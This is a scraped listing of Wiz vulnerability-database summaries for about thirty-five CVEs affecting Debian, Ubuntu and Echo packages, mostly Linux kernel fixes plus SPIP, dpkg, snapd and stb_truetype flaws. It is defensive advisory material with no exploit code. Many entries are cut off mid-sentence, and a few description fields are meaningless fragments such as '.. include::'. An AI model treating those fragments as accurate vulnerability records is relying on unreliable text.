## CVE-2026-32726: Linux Debian vulnerability analysis and mitigation
SciTokens C++ is a minimal library for creating and using SciTokens from C or C++. Prior to version 1.4.1, scitokens-cpp is vulnerable to an authorization bypass in path-based scope validation. The enforcer used a simple string-prefix comparison when checking whether a requested resource path was covered by a token's authorized scope path. Because the check did not require a path-segment boundary, a token scoped to one path could incorrectly authorize access to sibling paths that merely started with the same prefix. This issue has been patched in version 1.4.1.
Source : NVD
Score 8.1
Published March 31, 2026
Severity HIGH
CNA Score 8.1
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
blogs_wiz·CVSS 7.5
CVE-2025-65865 [HIGH] CVE-2025-65865 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-65865: Echo vulnerability analysis and mitigation
An integer overflow in eProsima Fast-DDS v3.3 allows attackers to cause a Denial of Service (DoS) via a crafted input.
Source : NVD
Score 7.5
Published December 23, 2025
Severity HIGH
CNA Score 7.5
Affected Technologies
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 23.4
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
fastdds
Sources
NVD
Echo Severity HIGH No Fix Added at: Dec 24, 2025
blogs_wiz·CVSS 8.3
CVE-2026-24808 [HIGH] CVE-2026-24808 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-24808: Linux Debian vulnerability analysis and mitigation
Integer Overflow or Wraparound vulnerability in RawTherapee (rtengine modules). This vulnerability is associated with program files dcraw.Cc.
This issue affects RawTherapee: through 5.11.
Source : NVD
Score 8.3
Published January 27, 2026
Severity HIGH
CNA Score 8.3
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
rawtherapee
Sources
NVD
Debian 11, 12, 13 Severity LOW No Fix Added at: Jan 28, 2026
Debian 14 Severity LOW Has Fix Added at: Jan 28, 2026
Echo No Fix Added at: Jan 28, 2026
blogs_wiz·CVSS 4.8
CVE-2025-71240 [MEDIUM] CVE-2025-71240 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-71240: Linux Debian vulnerability analysis and mitigation
SPIP before 4.2.15 allows Cross-Site Scripting (XSS) via crafted content in HTML code tags. The application does not properly verify JavaScript within code tags, allowing an attacker to inject malicious scripts that execute in a victim's browser.
Source : NVD
Score 4.8
Published February 19, 2026
Severity MEDIUM
CNA Score 4.8
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 9.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
spip
Sources
NVD
Debian 11 Severity MEDIUM No Fix Added at: Feb 20, 2026
Debian 13, 14 Severity MEDIUM Has Fix Added at: Feb
blogs_wiz·CVSS 8.7
CVE-2026-22205 [HIGH] CVE-2026-22205 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-22205: Linux Debian vulnerability analysis and mitigation
SPIP versions prior to 4.4.10 contain an authentication bypass vulnerability caused by PHP type juggling that allows unauthenticated attackers to access protected information. Attackers can exploit loose type comparisons in authentication logic to bypass login verification and retrieve sensitive internal data.
Source : NVD
Score 8.7
Published February 26, 2026
Severity HIGH
CNA Score 8.7
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 59.8
Exploitation Probability (EPSS) 0.4
Affected packages and libraries
spip
Sources
NVD
Debian 11 Severity HIGH No Fix Added at: Mar
blogs_wiz·CVSS 5.3
CVE-2026-23174 [MEDIUM] CVE-2026-23174 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23174: Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
nvme-pci: handle changing device dma map requirements
The initial state of dma_needs_unmap may be false, but change to true
while mapping the data iterator. Enabling swiotlb is one such case that
can change the result. The nvme driver needs to save the mapped dma
vectors to be unmapped later, so allocate as needed during iteration
rather than assume it was always allocated at the beginning. This fixes
a NULL dereference from accessing an uninitialized dma_vecs when the
device dma unmapping requirements change mid-iteration.
Source : NVD
Published February 14, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
blogs_wiz·CVSS 4.8
CVE-2025-0577 [MEDIUM] CVE-2025-0577 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-0577: Linux Debian vulnerability analysis and mitigation
An insufficient entropy vulnerability was found in glibc. The getrandom and arc4random family of functions may return predictable randomness if these functions are called again after the fork, which happens concurrently with a call to any of these functions.
Source : NVD
Score 4.8
Published February 18, 2026
Severity MEDIUM
CNA Score 4.8
Affected Technologies
Linux Debian
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 3.6
Exploitation Probability (EPSS) N/A
Affected packages and libraries
seal-glibc
Sources
NVD
Debian Severity MEDIUM Has Fix Added at: Jan 11, 2026
blogs_wiz·CVSS 9.8
CVE-2006-10003 [CRITICAL] CVE-2006-10003 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2006-10003: Linux Debian vulnerability analysis and mitigation
XML::Parser versions through 2.47 for Perl have an off-by-one heap buffer overflow in st_serial_stack.
In the case (stackptr == stacksize - 1), the stack will NOT be expanded. Then the new value will be written at location (++stackptr), which equals stacksize and therefore falls just outside the allocated buffer.
The bug can be observed when parsing an XML file with very deep element nesting.
Source : NVD
Score 9.8
Published March 19, 2026
Severity CRITICAL
CNA Score 9.8
Affected Technologies
Linux Debian
Linux Fedora
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 22
Exploitation Probability (EPSS) 0.1
blogs_wiz
CVE-2025-68369 CVE-2025-68369 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-68369: Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
ntfs3: init run lock for extend inode
After setting the inode mode of $Extend to a regular file, executing the
truncate system call will enter the do_truncate() routine, causing the
run_lock uninitialized error reported by syzbot.
Prior to patch 4e8011ffec79, if the inode mode of $Extend was not set to
a regular file, the do_truncate() routine would not be entered.
Add the run_lock initialization when loading $Extend.
syzbot reported:
INFO: trying to register non-static key.
Call Trace:
dump_stack_lvl+0x189/0x250 lib/dump_stack.c:120
assign_lock_key+0x133/0x150 kernel/locking/lockdep.c:984
register_lock_class+0x105/0x320 kernel/locking/lockdep.c:
blogs_wiz·CVSS 6.1
CVE-2025-64736 [MEDIUM] CVE-2025-64736 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-64736: Linux Debian vulnerability analysis and mitigation
An out-of-bounds read vulnerability exists in the ABF parsing functionality of The Biosig Project libbiosig 3.9.2 and Master Branch (5462afb0). A specially crafted .abf file can lead to an information leak. An attacker can provide a malicious file to trigger this vulnerability.
Source : NVD
Score 7.1
Published March 3, 2026
Severity HIGH
CNA Score 6.1
Affected Technologies
Linux Debian
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
biosig
Sources
NVD
Debian 11, 12, 13 Severity MEDIUM No Fix Added at: Mar 03, 2026
blogs_wiz·CVSS 5.3
CVE-2026-2604 [MEDIUM] CVE-2026-2604 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-2604: Linux Debian vulnerability analysis and mitigation
insecure local cache file removal
Source : NVD
Published February 18, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probability (EPSS) N/A
Affected packages and libraries
evolution-data-server
libebook-contacts-1_2-4
Sources
NVD
Debian 11, 14 Has Fix Added at: Feb 18, 2026
Debian 12, 13 No Fix Added at: Feb 18, 2026
Echo No Fix Added at: Feb 18, 2026
Red Hat 6, 7, 8, 9, 10 Severity MEDIUM No Fix Added at: Feb 17, 2026
Ubuntu 16.04, 18.04, 20.04 Severity MEDIUM No Fix Added at: Mar 02, 2026
Ubuntu 22.04, 24.04, 25.10 Severity
blogs_wiz·CVSS 5.3
CVE-2026-23373 [MEDIUM] CVE-2026-23373 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23373: Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
wifi: rsi: Don't default to -EOPNOTSUPP in rsi_mac80211_config
This triggers a WARN_ON in ieee80211_hw_conf_init and isn't the expected
behavior from the driver - other drivers default to 0 too.
Source : NVD
Published March 25, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux-hwe-6.14
linux-oracle
Sources
NVD
Debian 13 No Fix Added at: Mar 26, 2026
Debian 14 Has Fix Added at: Mar 26, 2026
Ubuntu 24.04
blogs_wiz·CVSS 5.3
CVE-2026-3312 [MEDIUM] CVE-2026-3312 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-3312: Linux Debian vulnerability analysis and mitigation
.. include::
Source : NVD
Published March 13, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probability (EPSS) N/A
Affected packages and libraries
pagure
Sources
NVD
Debian 11 Severity MEDIUM No Fix Added at: Mar 19, 2026
Debian 13 No Fix Added at: Mar 19, 2026
Echo No Fix Added at: Mar 19, 2026
blogs_wiz·CVSS 7.8
CVE-2026-23184 [HIGH] CVE-2026-23184 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23184: Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
binder: fix UAF in binder_netlink_report()
Oneway transactions sent to frozen targets via binder_proc_transaction()
return a BR_TRANSACTION_PENDING_FROZEN error but they are still treated
as successful since the target is expected to thaw at some point. It is
then not safe to access 't' after BR_TRANSACTION_PENDING_FROZEN errors
as the transaction could have been consumed by the now thawed target.
This is the case for binder_netlink_report() which dereferences 't'
after a pending frozen error, as pointed out by the following KASAN
report:
BUG: KASAN: slab-use-after-free in binder_netlink_report.isra.0+0x694/0x6c8
Read of size 8 at addr ffff00000f
blogs_wiz·CVSS 5.3
CVE-2026-23431 [MEDIUM] CVE-2026-23431 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23431: Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
spi: amlogic-spisg: Fix memory leak in aml_spisg_probe()
In aml_spisg_probe(), ctlr is allocated by
spi_alloc_target()/spi_alloc_host(), but fails to call
spi_controller_put() in several error paths. This leads
to a memory leak whenever the driver fails to probe after
the initial allocation.
Convert to use devm_spi_alloc_host()/devm_spi_alloc_target()
to fix the memory leak.
Source : NVD
Published April 3, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 4
blogs_wiz·CVSS 7.5
CVE-2026-2219 [HIGH] CVE-2026-2219 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-2219: Linux Debian vulnerability analysis and mitigation
It was discovered that dpkg-deb (a component of dpkg, the Debian package management system) does not properly validate the end of the data stream when uncompressing a zstd-compressed .deb archive, which may result in denial of service (infinite loop spinning the CPU).
Source : NVD
Score 7.5
Published March 7, 2026
Severity HIGH
CNA Score 7.5
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.8
Exploitation Probability (EPSS) N/A
Affected packages and libraries
seal-dpkg
dpkg
Sources
NVD
Debian 12 Severity MEDIUM No Fix Added at: Mar 08, 2026
Debian 13, 14 Severity HI
blogs_wiz·CVSS 5.1
CVE-2025-67603 [MEDIUM] CVE-2025-67603 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-67603: Linux Debian vulnerability analysis and mitigation
An Improper Authorization vulnerability in Foomuuri allows arbitrary users to influence the firewall configuration. This issue affects Foomuuri: from ? before 0.31.
Source : NVD
Score 5.1
Published January 8, 2026
Severity MEDIUM
CNA Score 5.1
Affected Technologies
Linux Debian
Linux Fedora
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.5
Exploitation Probability (EPSS) N/A
Affected packages and libraries
foomuuri_exporter
foomuuri
Sources
NVD
Debian 13, 14 Has Fix Added at: Jan 08, 2026
Echo Has Fix Added at: Jan 08, 2026
blogs_wiz·CVSS 5.3
CVE-2025-67483 [MEDIUM] CVE-2025-67483 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-67483: Linux Debian vulnerability analysis and mitigation
Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Wikimedia Foundation MediaWiki. This vulnerability is associated with program files resources/src/mediawiki.Page.Preview.Js.
This issue affects MediaWiki: from * before 1.43.6, 1.44.3, 1.45.1.
Source : NVD
Published February 3, 2026
Severity NONE
CNA Score N/A
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
mediawiki
Sources
NVD
Debian 11, 12 No Fix Added at: Dec 12, 2025
Debian 13, 14 Has Fix
blogs_wiz·CVSS 5.3
CVE-2026-5314 [MEDIUM] CVE-2026-5314 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-5314: Linux Debian vulnerability analysis and mitigation
A vulnerability was found in Nothings stb up to 1.26. Impacted is the function stbtt_InitFont_internal in the library stb_truetype.h of the component TTF File Handler. Performing a manipulation results in out-of-bounds read. Remote exploitation of the attack is possible. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way.
Source : NVD
Score 5.3
Published April 1, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Linux Debian
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 10.6
Exploitation Probability (EPSS) N/A
blogs_wiz·CVSS 4.6
CVE-2020-37038 [MEDIUM] CVE-2020-37038 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2020-37038: Echo vulnerability analysis and mitigation
Code Blocks 20.03 contains a denial of service vulnerability that allows attackers to crash the application by manipulating input in the FSymbols search field. Attackers can paste a large payload of 5000 repeated characters into the search field to trigger an application crash.
Source : NVD
Score 4.6
Published January 30, 2026
Severity MEDIUM
CNA Score 4.6
Affected Technologies
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
codeblocks
Sources
NVD
Echo Severity HIGH No Fix Added at: Jan 31, 2026
blogs_wiz·CVSS 9.8
CVE-2025-68263 [CRITICAL] CVE-2025-68263 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-68263: Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
ksmbd: ipc: fix use-after-free in ipc_msg_send_request
ipc_msg_send_request() waits for a generic netlink reply using an
ipc_msg_table_entry on the stack. The generic netlink handler
(handle_generic_event()/handle_response()) fills entry->response under
ipc_msg_table_lock, but ipc_msg_send_request() used to validate and free
entry->response without holding the same lock.
Under high concurrency this allows a race where handle_response() is
copying data into entry->response while ipc_msg_send_request() has just
freed it, leading to a slab-use-after-free reported by KASAN in
handle_generic_event():
BUG: KASAN: slab-use-after-free in handle_generic_ev
blogs_wiz·CVSS 6.9
CVE-2026-23323 [MEDIUM] CVE-2026-23323 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23323: Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
hwmon: (macsmc) Fix regressions in Apple Silicon SMC hwmon driver
The recently added macsmc-hwmon driver contained several critical
bugs in its sensor population logic and float conversion routines.
Specifically:
The voltage sensor population loop used the wrong prefix ("volt-"
instead of "voltage-") and incorrectly assigned sensors to the
temperature sensor array (hwmon->temp.sensors) instead of the
voltage sensor array (hwmon->volt.sensors). This would lead to
out-of-bounds memory access or data corruption when both temperature
and voltage sensors were present.
The float conversion in macsmc_hwmon_write_f32() had flawed exponent logic for value
blogs_wiz·CVSS 6.9
CVE-2025-71140 [MEDIUM] CVE-2025-71140 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-71140: Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
media: mediatek: vcodec: Use spinlock for context list protection lock
Previously a mutex was added to protect the encoder and decoder context
lists from unexpected changes originating from the SCP IP block, causing
the context pointer to go invalid, resulting in a NULL pointer
dereference in the IPI handler.
Turns out on the MT8173, the VPU IPI handler is called from hard IRQ
context. This causes a big warning from the scheduler. This was first
reported downstream on the ChromeOS kernels, but is also reproducible
on mainline using Fluster with the FFmpeg v4l2m2m decoders. Even though
the actual capture format is not supported, the affected code pa
blogs_wiz·CVSS 7.0
CVE-2026-23294 [HIGH] CVE-2026-23294 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23294: Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
bpf: Fix race in devmap on PREEMPT_RT
On PREEMPT_RT kernels, the per-CPU xdp_dev_bulk_queue (bq) can be
accessed concurrently by multiple preemptible tasks on the same CPU.
The original code assumes bq_enqueue() and __dev_flush() run atomically
with respect to each other on the same CPU, relying on
local_bh_disable() to prevent preemption. However, on PREEMPT_RT,
local_bh_disable() only calls migrate_disable() (when
PREEMPT_RT_NEEDS_BH_LOCK is not set) and does not disable
preemption, which allows CFS scheduling to preempt a task during
bq_xmit_all(), enabling another task on the same CPU to enter
bq_enqueue() and operate on the same per-CPU bq con
blogs_wiz·CVSS 5.5
CVE-2025-71105 [MEDIUM] CVE-2025-71105 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-71105: Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
f2fs: use global inline_xattr_slab instead of per-sb slab cache
As Hong Yun reported in mailing list:
loop7: detected capacity change from 0 to 131072
------------[ cut here ]------------
kmem_cache of name 'f2fs_xattr_entry-7:7' already exists
WARNING: CPU: 0 PID: 24426 at mm/slab_common.c:110 kmem_cache_sanity_check mm/slab_common.c:109 [inline]
WARNING: CPU: 0 PID: 24426 at mm/slab_common.c:110 __kmem_cache_create_args+0xa6/0x320 mm/slab_common.c:307
CPU: 0 UID: 0 PID: 24426 Comm: syz.7.1370 Not tainted 6.17.0-rc4 #1 PREEMPT(full)
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.13.0-1ubuntu1.1 04/01/2014
RIP: 0010:kmem_cache_sanity
blogs_wiz·CVSS 5.3
CVE-2026-24030 [MEDIUM] CVE-2026-24030 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-24030: Linux Debian vulnerability analysis and mitigation
An attacker might be able to trick DNSdist into allocating too much memory while processing DNS over QUIC or DNS over HTTP/3 payloads, resulting in a denial of service. In setups with a large quantity of memory available this usually results in an exception and the QUIC connection is properly closed, but in some cases the system might enter an out-of-memory state instead and terminate the process.
Source : NVD
Score 5.3
Published March 31, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 2.9
Exploitation Probability (EPSS) N/A
blogs_wiz·CVSS 5.3
CVE-2026-31405 [MEDIUM] CVE-2026-31405 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-31405: Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
media: dvb-net: fix OOB access in ULE extension header tables
The ule_mandatory_ext_handlers[] and ule_optional_ext_handlers[] tables
in handle_one_ule_extension() are declared with 255 elements (valid
indices 0-254), but the index htype is derived from network-controlled
data as (ule_sndu_type & 0x00FF), giving a range of 0-255. When
htype equals 255, an out-of-bounds read occurs on the function pointer
table, and the OOB value may be called as a function pointer.
Add a bounds check on htype against the array size before either table
is accessed. Out-of-range values now cause the SNDU to be discarded.
Source : NVD
Published April 6, 2026
blogs_wiz·CVSS 5.5
CVE-2025-71139 [MEDIUM] CVE-2025-71139 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-71139: Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
kernel/kexec: fix IMA when allocation happens in CMA area
*** Bug description ***
When I tested kexec with the latest kernel, I ran into the following warning:
[ 40.712410] ------------[ cut here ]------------
[ 40.712576] WARNING: CPU: 2 PID: 1562 at kernel/kexec_core.c:1001 kimage_map_segment+0x144/0x198
[...]
[ 40.816047] Call trace:
[ 40.818498] kimage_map_segment+0x144/0x198 (P)
[ 40.823221] ima_kexec_post_load+0x58/0xc0
[ 40.827246] __do_sys_kexec_file_load+0x29c/0x368
[...]
[ 40.855423] ---[ end trace 0000000000000000 ]---
*** How to reproduce ***
This bug is only triggered when the kexec target address is allocated in
the CMA area. If no
blogs_wiz·CVSS 8.6
CVE-2026-0846 [HIGH] CVE-2026-0846 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-0846: Linux Debian vulnerability analysis and mitigation
filestring()
nltk.util
Source : NVD
Score 8.6
Published March 9, 2026
Severity HIGH
CNA Score 8.6
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 27.9
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
nltk
Sources
NVD
Debian 11 Severity HIGH No Fix Added at: Mar 10, 2026
Debian 12, 13 Severity MEDIUM No Fix Added at: Mar 10, 2026
Debian 14 Severity HIGH Has Fix Added at: Mar 10, 2026
Echo Severity HIGH No Fix Added at: Mar 10, 2026
Ubuntu 16.04, 18.04, 20.04, 22.04, 24.04, 25.10 Severity MEDIUM No Fix Added at: Mar 26, 2026
## CVE-2025-14933 : Linux Debian vulnerability analysis and mitigation
Wiz (blogs_wiz) · CVSS 7.8 [HIGH]
NSF Unidata NetCDF-C NC Variable Integer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of NSF Unidata NetCDF-C. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.
The specific flaw exists within the parsing of NC variables. The issue results from the lack of proper validation of user-supplied data, which can result in an integer overflow before allocating a buffer. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-27266.
Source : NVD
Score 7.8
Published December 23, 2025
Severi
## CVE-2026-23432 : Linux Debian vulnerability analysis and mitigation
Wiz (blogs_wiz) · CVSS 5.3 [MEDIUM]
In the Linux kernel, the following vulnerability has been resolved:
mshv: Fix use-after-free in mshv_map_user_memory error path
In the error path of mshv_map_user_memory(), calling vfree() directly on
the region leaves the MMU notifier registered. When userspace later unmaps
the memory, the notifier fires and accesses the freed region, causing a
use-after-free and potential kernel panic.
Replace vfree() with mshv_partition_put() to properly unregister
the MMU notifier before freeing the region.
Source : NVD
Published April 3, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probabi
## CVE-2026-35093 : Linux Debian vulnerability analysis and mitigation
Wiz (blogs_wiz) · CVSS 8.8 [HIGH]
A flaw was found in libinput. A local attacker who can place a specially crafted Lua bytecode file in certain system or user configuration directories can bypass security restrictions. This allows the attacker to run unauthorized code with the same permissions as the program using libinput, such as a graphical compositor. This could lead to the attacker monitoring keyboard input and sending that information to an external location.
Source : NVD
Score 8.8
Published April 1, 2026
Severity HIGH
CNA Score 8.8
Affected Technologies
Linux Debian
Linux Fedora
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 4
Exploitat
## CVE-2026-23309 : Linux Debian vulnerability analysis and mitigation
Wiz (blogs_wiz) · CVSS 5.3 [MEDIUM]
In the Linux kernel, the following vulnerability has been resolved:
tracing: Add NULL pointer check to trigger_data_free()
If trigger_data_alloc() fails and returns NULL, event_hist_trigger_parse()
jumps to the out_free error path. While kfree() safely handles a NULL
pointer, trigger_data_free() does not. This causes a NULL pointer
dereference in trigger_data_free() when evaluating
data->cmd_ops->set_filter.
Fix the problem by adding a NULL pointer check to trigger_data_free().
The problem was found by an experimental code review agent based on
gemini-3.1-pro while reviewing backports into v6.18.y.
Source : NVD
Published March 25, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Has Public Exploit No
H
## CVE-2025-40352 : Linux Debian vulnerability analysis and mitigation
Wiz (blogs_wiz) · CVSS 6.9 [MEDIUM]
In the Linux kernel, the following vulnerability has been resolved:
platform/mellanox: mlxbf-pmc: add sysfs_attr_init() to count_clock init
The lock-related debug logic (CONFIG_LOCK_STAT) in the kernel is noting
the following warning when the BlueField-3 SOC is booted:
BUG: key ffff00008a3402a8 has not been registered!
------------[ cut here ]------------
DEBUG_LOCKS_WARN_ON(1)
WARNING: CPU: 4 PID: 592 at kernel/locking/lockdep.c:4801 lockdep_init_map_type+0x1d4/0x2a0 Call trace:
lockdep_init_map_type+0x1d4/0x2a0
__kernfs_create_file+0x84/0x140
sysfs_add_file_mode_ns+0xcc/0x1cc
internal_create_group+0x110/0x3d4
internal_create_groups.part.0+0x54/0xcc
sysfs_create_groups+0x24/0x40
device_add+0x6e8/0x93c
device_regis
## CVE-2014-125112 : Linux Debian vulnerability analysis and mitigation
Wiz (blogs_wiz) · CVSS 9.8 [CRITICAL]
Plack::Middleware::Session::Cookie versions through 0.21 for Perl allows remote code execution.
Plack::Middleware::Session::Cookie versions through 0.21 has a security vulnerability where it allows an attacker to execute arbitrary code on the server during deserialization of the cookie data, when there is no secret used to sign the cookie.
Source : NVD
Score 9.8
Published March 26, 2026
Severity CRITICAL
CNA Score 9.8
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 30.9
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
libplack-middleware-session-per
## CVE-2026-3888 : Linux Debian vulnerability analysis and mitigation
Wiz (blogs_wiz) · CVSS 5.3 [MEDIUM]
Local privilege escalation in snapd on Linux allows local attackers to get root privilege by re-creating snap's private /tmp directory when systemd-tmpfiles is configured to automatically clean up this directory. This issue affects Ubuntu 16.04 LTS, 18.04 LTS, 20.04 LTS, 22.04 LTS, and 24.04 LTS.
Source : NVD
Score 7.8
Published March 17, 2026
Severity HIGH
CNA Score 7.8
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
snapd
Sources
NVD
Debian 11, 14 Severity HIGH No Fix Added at: Mar 17,
## CVE-2026-5315 : Linux Debian vulnerability analysis and mitigation
Wiz (blogs_wiz) · CVSS 5.3 [MEDIUM]
A vulnerability was determined in Nothings stb up to 1.26. The affected element is the function stbtt__buf_get8 in the library stb_truetype.h of the component TTF File Handler. Executing a manipulation can lead to out-of-bounds read. The attack can be executed remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way.
Source : NVD
Score 5.3
Published April 2, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Linux Debian
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 10.6
Exploitation Probability (EPSS)
## CVE-2025-71102 : Linux Debian vulnerability analysis and mitigation
Wiz (blogs_wiz) · CVSS 5.5 [MEDIUM]
In the Linux kernel, the following vulnerability has been resolved:
scs: fix a wrong parameter in __scs_magic
__scs_magic() needs a 'void *' variable, but a 'struct task_struct *' is
given. 'task_scs(tsk)' is the starting address of the task's shadow call
stack, and '__scs_magic(task_scs(tsk))' is the end address of the task's
shadow call stack. Here should be '__scs_magic(task_scs(tsk))'.
The user-visible effect of this bug is that when CONFIG_DEBUG_STACK_USAGE
is enabled, the shadow call stack usage checking function
(scs_check_usage) would scan an incorrect memory range. This could lead to:
- Inaccurate stack usage reporting: the function would calculate
wrong usage statistics for the shadow call stack, potentially
## CVE-2023-54182 : Linux Debian vulnerability analysis and mitigation
Wiz (blogs_wiz)
In the Linux kernel, the following vulnerability has been resolved:
f2fs: fix to check readonly condition correctly
